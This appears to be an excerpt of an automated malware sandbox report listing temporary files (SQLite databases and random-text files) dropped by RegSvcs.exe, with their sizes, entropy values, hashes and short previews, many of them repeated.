Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1B81.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1B82.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1B93.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1B94.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1BA4.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1BB5.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1BC5.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1BD6.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp54BA.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp54BB.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp54CB.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp54DC.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp54EC.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp54ED.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp54FE.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp550F.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp6D47.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\Temp\tmp6D57.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\Temp\tmp6D58.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\Temp\tmp6D59.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
